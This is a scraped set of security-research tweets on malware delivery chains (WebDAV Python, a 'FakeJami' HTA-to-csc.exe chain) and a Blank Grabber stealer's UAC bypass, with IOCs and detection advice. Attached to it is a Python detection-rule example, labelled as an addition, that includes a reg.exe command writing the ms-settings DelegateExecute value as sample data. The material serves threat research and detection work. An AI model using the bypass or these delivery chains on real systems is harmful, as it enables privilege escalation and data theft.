NEW: In what we've dubbed an "AI-in-the-middle attack," an adversary could abuse agent mode in commercial AI products to perform actions on behalf of a user. 🤖
🧑💻 Read our latest research for example malicious prompts and detection guidance:
https://t.co/QuPHtpHJGj
@Oddvarmoe @HackingLZ https://t.co/7s4aSL27id
I mean, he does have some credibility he has some classics like "Hacking a computer with an image JPG reverse shell from kali linux on windows pc"
If you've been considering Investigating Windows Endpoints, someone published a new blog post comparing the course to FOR500. It's filled with great information! Check it out here: https://t.co/eI11qvPccl #DFIR
Who’s the real #GrimResource? Spoiler: It’s us! 😏
Here's our latest blog on using MSC files for initial access: https://t.co/aQ0Of11pU8
Fun fact: @elastic’s post on this technique came from a sample caught by a blue team, originally used by a red team through our OST offering.
👋 Today we have a guest post from @4ayymm on malicious Python over #WebDAV
(T1059.006) Adversaries may abuse Python commands and scripts for execution.
⛓ The delivery sequence:
1️⃣ Embed Malicious JavaScript: A website contains malicious JavaScript that tricks users into opening a file;
2️⃣ Enable Remote Connection: The code manipulates users into enabling a remote connection via the 'search-ms' function;
3️⃣ Connect to WebDAV Directory: The connection leads to a WebDAV directory on an external server;
4️⃣ Disguise LNK File: A LNK shortcut file in the directory is disguised as a harmless PDF document;
5️⃣ Open LNK File: Opening the LNK file establishes communication with a remote Python binary for Windows;
6️⃣ Execute Malicious Script: The #Python binary executes a remotely hosted malicious Python script.
🧐 Detection Opportunities
Monitor connections to remote UNC paths
Monitor for any remote execution over a UNC path
🔍 #IOCs
Mfa-files[.]firstcloudit[.]com
postfix-mail[.]firstcloudit[.]com
*[.]firstcloudit[.]com
kjskrvmwerffssd[.]kozow[.]com
172[.]114[.]170[.]18
See the Sample 👇
https://t.co/a6wOrdvL1P
From OneNote to RansomNote: An Ice Cold Intrusion
🌟Analysis & reporting completed by @iiamaleks, @IrishD34TH, and @Miixxedup
🎵Audio (New Voice!): Available on Spotify, Apple, YouTube and more!
🏹Services: https://t.co/k8UVEOdKTQ
📚Report: https://t.co/Ll3pwfh9fp
#FakeJami
🔺 (T1218.005) Adversaries use mshta.exe to run malicious .hta files and scripts by exploiting a trusted Windows utility. Various threats employ mshta.exe for initial compromise and code execution.
🔺 (T1027.004) Adversaries can obfuscate #payloads by delivering uncompiled code files to victims, evading analysis and protections targeting executables/binaries. These files require compilation prior to execution, typically through native utilities such as csc.exe or GCC/MinGW.
🔺 The "FakeJami" execution chain starts with a malicious HTA file, which triggers a PowerShell script to contact "seedchicago[.]co[.]ke" and download "absurd.bin". This file is then piped into "uar3fnt0.cmdline". The transition to "uar3fnt0.cmdline" prepares the malware for its next action, avoiding detection. The process culminates with "uar3fnt0.cmdline" being compiled and executed by the C# compiler (csc.exe), deploying the final payload designed for information theft. This sequence demonstrates the #malware's methodical use of system tools and Internet resources to achieve its goal of extracting sensitive data from the targeted system.
🕵️ Detection options:
------------------
Monitor execution paths for csc.exe
Monitor child processes for hta files
Monitor the creation of .cmdline files
🔷 IOCs:
------------------
Vicdakenya[.]org
seedchicago[.]co[.]ke
209[.]188[.]7[.]251
58b29a63dc11231e362ac37d028bdc024b5f5014943f0ddc69709fedcd58cab1
5b9708704a61f43b4ed3432c650ef3ec694e2ecfbf70bfa410db2a545a7730a0
🔍 See the Sample 👇
https://t.co/IRSuFVJJYS
📌 Blank Grabber: #UAC Bypass
Thanks to Alex @4ayymm for this amazing finding!
Let's dive in:
#BlankGrabber is self-described as “The most powerful #stealer written in Python 3 and packed with a lot of features.” One of these key features is UAC bypass methods baked into the execution.
❗️ (T1548.002) Adversaries may bypass UAC mechanisms to elevate process privileges on the system.
Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.
⚙️ This sample utilizes ComputerDefaults.exe to sideload its payload, bypassing UAC. This is done by writing to the HKCU:\software\classes\ms-settings\shell\open\command subkey, which can be used to specify an action when a settings app is invoked.
Then, the payload is set to "DelegateExecute". This is a registry entry used by Windows to delegate execution to a specified CLSID, which is part of the COM (Component Object Model) architecture.
📡 Detection Opportunities
Monitor registry writes to the "HKCU:\\software\\classes\\ms-settings\\shell\\open\\command" subkey
Below is regex to help your hunting/detection. (reg .* hkcu\\Software\\Classes\\ms\-settings\\shell\\open\\.*)
⚙️ Bypass UAC using ComputerDefaults (PowerShell) https://t.co/ufIIkJeBwY
🛰️ IOCs
5e455f6e81774b115d394ccf62b51afe52ecf0504a394ba9c5146550117f0acc
ad61f892fa84ba1242f409e82f7e6c4742b58ecbbbd3151fc2d20a9f7b894b58
6ae6c801471f9a6748f4468f6986d22935b23dcee5ff18b6df104c19f522d480
147[.]185[.]221[.]17
🔎 See the Sample ↘️ https://t.co/Av1ovYalXJ
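The detection opportunities listed in the WebDAV post (remote UNC paths and execution over them), the FakeJami post (csc.exe execution, mshta.exe child processes, .cmdline files) and the Blank Grabber post (the ms-settings\shell\open\command registry write, using the regex given there) are all simple pattern matches over process telemetry. The block below is an added example that is not part of any of the posts above: it runs those rules over constructed, Sysmon-style process-creation records (image, command line, parent) with placeholder hosts and paths. The ms-settings regex is the one from the post; the other patterns, the field names and the sample events are this example's own assumptions, and the event layout is simplified rather than real Sysmon output.

```python
import re
from typing import Dict, List

# Constructed sample telemetry (not from the original posts): simplified
# Sysmon-style process-creation records. Hosts and paths are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {  # a Python binary launched straight from a WebDAV/UNC share
        "image": r"\\203.0.113.5\DavWWWRoot\python.exe",
        "cmd": r"\\203.0.113.5\DavWWWRoot\python.exe \\203.0.113.5\DavWWWRoot\s.py",
        "parent": r"C:\Windows\explorer.exe",
    },
    {  # csc.exe compiling a .cmdline response file, spawned by PowerShell
        "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
        "cmd": r"csc.exe /noconfig /fullpaths @C:\Users\u\AppData\Local\Temp\uar3fnt0.cmdline",
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {  # reg.exe writing the ms-settings handler described in the UAC bypass post
        "image": r"C:\Windows\System32\reg.exe",
        "cmd": r'reg add hkcu\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ /d ""',
        "parent": r"C:\Windows\System32\cmd.exe",
    },
    {  # benign activity, should not fire anything
        "image": r"C:\Windows\System32\notepad.exe",
        "cmd": r"notepad.exe C:\Users\u\notes.txt",
        "parent": r"C:\Windows\explorer.exe",
    },
    {  # PowerShell started by mshta.exe (HTA execution chain)
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmd": r"powershell.exe -NoProfile -File C:\Users\u\AppData\Local\Temp\x.ps1",
        "parent": r"C:\Windows\System32\mshta.exe",
    },
]

# "\\host\" : two literal backslashes, a host name with no backslash or space,
# then one more backslash. Written for Python's re module.
UNC_PREFIX = r"\\\\[^\\\s]+\\"

# Rules: (name, event field to inspect, compiled pattern).
# The ms-settings pattern is copied from the Blank Grabber post; the rest are
# this example's own encoding of the monitoring advice in the posts.
RULES = [
    ("unc_image_execution", "image", re.compile("^" + UNC_PREFIX, re.I)),
    ("unc_path_in_cmdline", "cmd", re.compile(UNC_PREFIX, re.I)),
    ("csc_cmdline_compile", "cmd", re.compile(r"csc\.exe.*\.cmdline\b", re.I)),
    ("mshta_spawned_child", "parent", re.compile(r"\\mshta\.exe$", re.I)),
    ("ms_settings_command_write", "cmd",
     re.compile(r"reg .* hkcu\\Software\\Classes\\ms\-settings\\shell\\open\\.*", re.I)),
]


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule that fires on one event, in rule order."""
    return [name for name, field, rx in RULES if rx.search(event.get(field, ""))]


def hunt(events: List[Dict[str, str]]) -> Dict[str, List[int]]:
    """Map each rule that fired to the indices of the events that triggered it."""
    hits: Dict[str, List[int]] = {}
    for i, ev in enumerate(events):
        for name in evaluate(ev):
            hits.setdefault(name, []).append(i)
    return hits


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, evaluate(ev) or "-", ev["cmd"][:60])
```

The page's regex is case-sensitive as written and only matches the short `hkcu` hive name; the example compiles it with `re.I`, and a production rule would also want the `HKEY_CURRENT_USER` spelling and registry-event telemetry (not only reg.exe command lines), since the sample can set the value through the registry API without ever spawning reg.exe.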
I really like the consistency and uniformity of Windows. 😅
ConDrv can be managed via:
1. IOCTLs such as IOCTL_CONDRV_READ_IO,
2. IOCTL_CONDRV_ISSUE_USER_IO, containing the command in the ApiNumber field,
3. NtUserConsoleControl/ConsoleControl() with a CONSOLECONTROL enum value as the command.
I made a thing, based on the excellent work of other people and some of my own experience. It's ok for a v1, but it still needs work to make it more useful.
I'm still learning proper source management, so it's a start
#DFIR
https://t.co/yGED3pObrZ
I've decided to offer a special promotion for a few days, giving a 40% discount on my Mastering Windows Internals course. It includes six crucial modules, each 90 minutes long, providing a balance of theory and practice. I hope you will like it. :)
Link below ⤵
It’s very common for us to see offensive tooling enable SeDebugPrivilege so that they may bypass certain OS checks. However, what does this mean? Which OS checks are skipped? I dove into this and decided to write a blog on it. Check it out!
https://t.co/c7pEs48zTF